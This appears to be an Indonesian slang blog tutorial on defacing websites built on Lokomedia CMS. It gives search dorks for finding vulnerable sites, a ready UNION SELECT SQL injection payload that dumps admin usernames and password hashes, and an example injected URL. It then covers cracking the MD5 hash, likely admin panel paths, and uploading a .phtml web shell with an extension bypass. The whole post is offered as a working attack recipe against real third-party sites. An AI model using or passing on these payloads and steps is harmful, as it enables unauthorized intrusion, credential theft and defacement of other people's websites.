deface poc sql lokomedia

hello World ; Siang Fans, Please Say Hello Haters :* xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs, pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah yg ada pada CMS Lokomedia nih, kite suntik2an dlu, *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja, kali aja masih crotz Langsung aje Tutorial SQL Injection on Lokomedia CMS . Langsung intip tutor ;* Dork : - inurl:kategori-23-hiburan.html - inurl:hal-tentang-kami.html - inurl:statis-1-pengantar.html - inurl:statis-19-beasiswa.html - inurl:statis-22-kerjasama.html (kembangin lagi gunakan otak bokepers Lu, biar dpt yg Vuln and Verawan gengs ;*) eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+ 1. Dorking menggunakan Search Engine 2. Pilih web target, Lalu masukan eXploitnya. di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html silahkan oprek2 sendiri Query yg pas utk Target agan Sekarang sudah kelihatan user sama passwordnya di bagian title. kemudian ctrl+u untuk melihatnya lebih jelas. Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin. Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini. Untuk login biasanya di : - www.target.c0li/admin - www.target.c0li/adminweb - www.target.c0li/administrator - www.target.c0li/redaktur Kali ini loginnya berada di target.c0li/adminweb/ , Kemudian masukan user dan pass di form. Dan hasilnya seperti ini Untuk mengupload shell bisa dibagian Download, seperti ini Untuk mengakses shell biasanya di target.c0li/files/namashellLu *Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3 Mudahkan x_O ? Stay Cool and Keep ./Crotz , gaes <(") bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.